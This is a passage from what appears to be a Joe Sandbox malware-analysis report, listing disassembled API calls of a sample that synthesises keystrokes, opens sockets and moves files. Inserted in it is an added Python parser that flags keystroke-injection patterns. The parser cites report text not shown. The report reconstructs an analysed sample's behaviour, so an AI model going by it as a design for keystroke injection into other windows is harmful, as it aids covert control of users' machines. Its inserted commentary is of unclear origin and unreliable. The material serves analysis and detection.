                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: febf34c60f95eea78616b03b97af777a1aad5e1f5a223b6cebda21a6687dc366
                                        • Instruction ID: 14789caaadbc1432f5ffbbf56457909f8d44d4425a007b803c7805392fd46e83
                                        • Opcode Fuzzy Hash: febf34c60f95eea78616b03b97af777a1aad5e1f5a223b6cebda21a6687dc366
                                        • Instruction Fuzzy Hash: 8A911771D0021DAFDF14DFA4C891AEEB7B8BF48310F10816AE919A7251EB749A44DFA0
                                        APIs
                                        • GetMenu.USER32(?), ref: 00102183
                                        • GetMenuItemCount.USER32(00000000), ref: 001021B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001021DD
                                        • _wcslen.LIBCMT ref: 00102213
                                        • GetMenuItemID.USER32(?,?), ref: 0010224D
                                        • GetSubMenu.USER32(?,?), ref: 0010225B
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001022E3
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: 36487d2b13df04fa7b7160f5ffc9d929d8ded7c0bfa20a730f672d6181f9733a
                                        • Instruction ID: 218dcb95ce6adf3f65b6dd16d1320aa5db3446d533c4108b8c3cfc31d5070279
                                        • Opcode Fuzzy Hash: 36487d2b13df04fa7b7160f5ffc9d929d8ded7c0bfa20a730f672d6181f9733a
                                        • Instruction Fuzzy Hash: F5717175E00205AFCB14EFA4C845AAEB7F5FF48310F158459E89AEB381D774AD418F90
                                        APIs
                                        • GetParent.USER32(?), ref: 000DAEF9
                                        • GetKeyboardState.USER32(?), ref: 000DAF0E
                                        • SetKeyboardState.USER32(?), ref: 000DAF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 000DAF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 000DAFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 000DAFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000DB020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: adcc74040cc46d82aa64f367adc1e6c09f584ddb0b3a408f58d5a48683a07c7b
                                        • Instruction ID: e69cbe20b6963c4a373f7ed4290fedb4286738cde82387a48ea76826a73d8599
                                        • Opcode Fuzzy Hash: adcc74040cc46d82aa64f367adc1e6c09f584ddb0b3a408f58d5a48683a07c7b
                                        • Instruction Fuzzy Hash: 6651EEA1A043D17DFB3683348845BBBBEE95B06304F08858AF1D985AC3C3D9A8C8D771
                                        APIs
                                        • GetParent.USER32(00000000), ref: 000DAD19
                                        • GetKeyboardState.USER32(?), ref: 000DAD2E
                                        • SetKeyboardState.USER32(?), ref: 000DAD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000DADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000DADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000DAE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000DAE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 5348cf70ec806e7d1897f9683dbe879ced0eabc372c7e7b4e9dcd5c4935bfbee
                                        • Instruction ID: 4e7706e37750cc071754f69a20e763d41d3e1aaf900601957689956780ce5f9a
                                        • Opcode Fuzzy Hash: 5348cf70ec806e7d1897f9683dbe879ced0eabc372c7e7b4e9dcd5c4935bfbee
                                        • Instruction Fuzzy Hash: B151D5A16047D53DFB3683348C55BBA7FE95B47300F08858AE1D646AC3D294EC88E776
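                                         The two records above and the GetMenu record before them list their PostMessageW arguments as raw hex, which hides the point of the sequence: after SetKeyboardState the code posts WM_KEYDOWN (0x100) or WM_KEYUP (0x101) for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B) to a target window, and the menu record posts WM_COMMAND (0x111). As an added example (it is not part of this Joe Sandbox report, and it is not code from the sample), the Python below parses API lines in exactly this report format, resolves the window-message, virtual-key and socket constants, and flags the SetKeyboardState-then-posted-modifier-keys pattern. The sample input is copied from the records on this page; reading that pattern as the runtime's way of synthesising keystrokes into another window (consistent with the report's "compiled AutoIt script" verdict and the AUTOIT.ERROR string above) is my interpretation, not a statement the report makes.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied verbatim from the function records in this report.
SAMPLE = """\
• GetParent.USER32(00000000), ref: 000DAD19
• GetKeyboardState.USER32(?), ref: 000DAD2E
• SetKeyboardState.USER32(?), ref: 000DAD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000DADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000DADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000DAE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000DAE38
  • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001022E3
• _wcslen.LIBCMT ref: 00102213
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000F1112
"""

# One report line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(args)" (absent for CRT calls such as _wcslen.LIBCMT), then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$",
    re.IGNORECASE,
)

# Only the constants that occur in the records on this page (Win32 / Winsock values).
WINDOW_MESSAGES = {0x0030: "WM_SETFONT", 0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND"}
MODIFIER_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
ADDRESS_FAMILY = {2: "AF_INET"}
SOCKET_TYPE = {1: "SOCK_STREAM"}
PROTOCOL = {6: "IPPROTO_TCP"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                 # int per argument, None where the report prints "?"
    ref: int                   # address of the call site
    subcall: Optional[int] = None  # address of the callee when the line is a subcall entry


def parse_api_lines(text: str) -> list:
    """Parse the 'APIs' bullet lines of a Joe Sandbox function record."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a.strip(), 16)
                for a in raw.split(",") if a.strip() != ""]
        calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args,
                             int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def _name(table: dict, value: Optional[int]) -> str:
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def describe(call: ApiCall) -> str:
    """Render a call with its well-known constants resolved to symbolic names."""
    a = call.args
    if call.api in ("PostMessageW", "SendMessageW") and len(a) >= 3:
        return f"{call.api}({_name(WINDOW_MESSAGES, a[1])}, wParam={_name(MODIFIER_KEYS, a[2])})"
    if call.api == "socket" and len(a) >= 3:
        return f"socket({_name(ADDRESS_FAMILY, a[0])}, {_name(SOCKET_TYPE, a[1])}, {_name(PROTOCOL, a[2])})"
    return call.api


def find_modifier_injection(calls: list) -> list:
    """Return the modifier keys posted as WM_KEYDOWN/WM_KEYUP after a SetKeyboardState call.

    Three or more such posts in one record mean the function is synthesising keystrokes
    into another window rather than typing them (interpretation, not a report finding).
    """
    seen_set_state = False
    posted = []
    for c in calls:
        if c.api == "SetKeyboardState":
            seen_set_state = True
        elif (seen_set_state and c.api == "PostMessageW" and len(c.args) >= 3
              and c.args[1] in (0x0100, 0x0101) and c.args[2] in MODIFIER_KEYS):
            posted.append(MODIFIER_KEYS[c.args[2]])
    return posted if len(posted) >= 3 else []


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X}  {describe(c)}")
    print("modifier keys posted after SetKeyboardState:", find_modifier_injection(calls))
```

                                         The parser accepts the three line shapes that appear in these records (plain call, subcall entry, and a CRT call without an argument list), so it can be pointed at a whole copied "APIs" section; only the constants actually seen on this page are resolved, and anything else is echoed back as hex rather than guessed.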
                                        APIs
                                        • GetConsoleCP.KERNEL32(000B3CD6,?,?,?,?,?,?,?,?,000A5BA3,?,?,000B3CD6,?,?), ref: 000A5470
                                        • __fassign.LIBCMT ref: 000A54EB
                                        • __fassign.LIBCMT ref: 000A5506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,000B3CD6,00000005,00000000,00000000), ref: 000A552C
                                        • WriteFile.KERNEL32(?,000B3CD6,00000000,000A5BA3,00000000,?,?,?,?,?,?,?,?,?,000A5BA3,?), ref: 000A554B
                                        • WriteFile.KERNEL32(?,?,00000001,000A5BA3,00000000,?,?,?,?,?,?,?,?,?,000A5BA3,?), ref: 000A5584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 5ce044ad492bb82c8b95de3de62e67e084b970477e73f6e466e8a593c2c0a99a
                                        • Instruction ID: 2f5d8cb626486ae2a067f05bc153d7e2d0e65850c96d29fe6f04745d46a7338b
                                        • Opcode Fuzzy Hash: 5ce044ad492bb82c8b95de3de62e67e084b970477e73f6e466e8a593c2c0a99a
                                        • Instruction Fuzzy Hash: A051AF70E006499FDB11CFA8DC55AEEBBF9FF0A301F14411AF955E7291D6309A41CBA0
                                        APIs
                                          • Part of subcall function 000F304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                          • Part of subcall function 000F304E: _wcslen.LIBCMT ref: 000F309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000F1112
                                        • WSAGetLastError.WSOCK32 ref: 000F1121
                                        • WSAGetLastError.WSOCK32 ref: 000F11C9
                                        • closesocket.WSOCK32(00000000), ref: 000F11F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: 1dc059014ce38cfd1f35fe70f9e8d299b8e7368829e322a9f2a7c9d542e0f28d
                                        • Instruction ID: eba6731e25b54f059f5732b6d122b490f02dd1740e8f00d757c15be177f084d5
                                        • Opcode Fuzzy Hash: 1dc059014ce38cfd1f35fe70f9e8d299b8e7368829e322a9f2a7c9d542e0f28d
                                        • Instruction Fuzzy Hash: 9A41CF31600208AFDB109F24C884BE9B7E9FF45324F148159FA599B692C774AD818BE1
                                        APIs
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000DCF22,?), ref: 000DDDFD
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000DCF22,?), ref: 000DDE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 000DCF45
                                        • MoveFileW.KERNEL32(?,?), ref: 000DCF7F
                                        • _wcslen.LIBCMT ref: 000DD005
                                        • _wcslen.LIBCMT ref: 000DD01B
                                        • SHFileOperationW.SHELL32(?), ref: 000DD061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: fa35816fab08a30d555e778e236841d35d7fa7f3e3fa5b467e666f4b95c167aa
                                        • Instruction ID: 5aac7ee7fdedffe5af7bbed41f01aebd36ef772d1cdb5786515fc3763b58c96c
                                        • Opcode Fuzzy Hash: fa35816fab08a30d555e778e236841d35d7fa7f3e3fa5b467e666f4b95c167aa
                                        • Instruction Fuzzy Hash: 324135719453195FDF52EBA4C981EDDB7F9AF58380F1000E7E549EB242EA34A688CF60
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00102E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00102EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00102EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00102F0B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: 679cb17382571adb6e55e061a19148b9f9996952594eb767b1d62d0ff70d9f03
                                        • Instruction ID: e1346d06eb0dc5b2ad6388371f9c3d1271d9de56896b3d2930365f4c60f1b6c4
                                        • Opcode Fuzzy Hash: 679cb17382571adb6e55e061a19148b9f9996952594eb767b1d62d0ff70d9f03
                                        • Instruction Fuzzy Hash: 38310434684254AFDB21CF58DC88FA537E5FB9A754F1501A4FA848F6F2CBB1A880DB41
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 000D7792
                                        • SysAllocString.OLEAUT32(?), ref: 000D77B0
                                        • SysFreeString.OLEAUT32(?), ref: 000D77B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000D77DE
                                        • SysAllocString.OLEAUT32(?), ref: 000D77EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: ad719607bb837ef216e219095e753c273f3ae68516f70b0bcbd5ab2a8b539014
                                        • Instruction ID: 62497bc6b464995094c8ac2281cc91652b3044a7db2d0bd81b3da40f9a0de2a7
                                        • Opcode Fuzzy Hash: ad719607bb837ef216e219095e753c273f3ae68516f70b0bcbd5ab2a8b539014
                                        • Instruction Fuzzy Hash: D7217176608219AFDB109FA8CC84CBB77ECFB097647048526F959DB291E6709C818BB4
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7868
                                        • SysAllocString.OLEAUT32(00000000), ref: 000D786B
                                        • SysAllocString.OLEAUT32 ref: 000D788C
                                        • SysFreeString.OLEAUT32 ref: 000D7895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000D78AF
                                        • SysAllocString.OLEAUT32(?), ref: 000D78BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 2b1680431c10056fd365a3cff88e2a2bcb487b270b4d98129a83a1286a8617b9
                                        • Instruction ID: c019f996323b99258cfcfaec71d03c907f41c6bea7f4cc288086dae20bb910d0
                                        • Opcode Fuzzy Hash: 2b1680431c10056fd365a3cff88e2a2bcb487b270b4d98129a83a1286a8617b9
                                        • Instruction Fuzzy Hash: C2214435604205AFDB10AFB8DC89DBA77ECFB097607108126F959CB2A1EA74DC81DB74
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 000E04F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: c1d1fa9df03e9f02c11292978621c6f9a9e98b9d8399b337ed9c9e89337d0aa3
                                        • Instruction ID: 5574a9fd177f52a2bf5251ed29f62512e4994a91c4bbfe67193a3b3b0ff3d840
                                        • Opcode Fuzzy Hash: c1d1fa9df03e9f02c11292978621c6f9a9e98b9d8399b337ed9c9e89337d0aa3
                                        • Instruction Fuzzy Hash: 73215E76500745EFDB209F2ADC44A9B77F4AF85764F604A19E8E1E62E0D7B09980CF60
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 000E05C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000E0601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: f724819d0b9f6a5c2681aa498b817cf07fdd2d187f3ecb9f865c7bbc0711d0f3
                                        • Instruction ID: ec67d3beca986d446984c33adad9f54c333f3604c9c54c219a9c3d29ca5d018f
                                        • Opcode Fuzzy Hash: f724819d0b9f6a5c2681aa498b817cf07fdd2d187f3ecb9f865c7bbc0711d0f3
                                        • Instruction Fuzzy Hash: 4C217F755003459FDB209F6A9C04B9A77E8BF95724F240B1AE8A1F72E0D7F099E0CB50
                                        APIs
                                          • Part of subcall function 0007600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                          • Part of subcall function 0007600E: GetStockObject.GDI32(00000011), ref: 00076060
                                          • Part of subcall function 0007600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00104112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0010411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0010412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00104139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00104145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 3b5b4e03c6786a0b9b72d59da6e5d559c1b38ad679ebf29a907ab9b5961d2381
                                        • Instruction ID: 009aef5990459c4cafcfc122a69f64e0a8c7e47a54fd93ffda8891db2a8d31f3
                                        • Opcode Fuzzy Hash: 3b5b4e03c6786a0b9b72d59da6e5d559c1b38ad679ebf29a907ab9b5961d2381
                                        • Instruction Fuzzy Hash: F11193B214011DBEEF119F64CC85EE77F5DEF08798F014110B758A2190CBB29C61DBA4
                                        APIs
                                          • Part of subcall function 000AD7A3: _free.LIBCMT ref: 000AD7CC
                                        • _free.LIBCMT ref: 000AD82D
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000AD838
                                        • _free.LIBCMT ref: 000AD843
                                        • _free.LIBCMT ref: 000AD897
                                        • _free.LIBCMT ref: 000AD8A2
                                        • _free.LIBCMT ref: 000AD8AD
                                        • _free.LIBCMT ref: 000AD8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
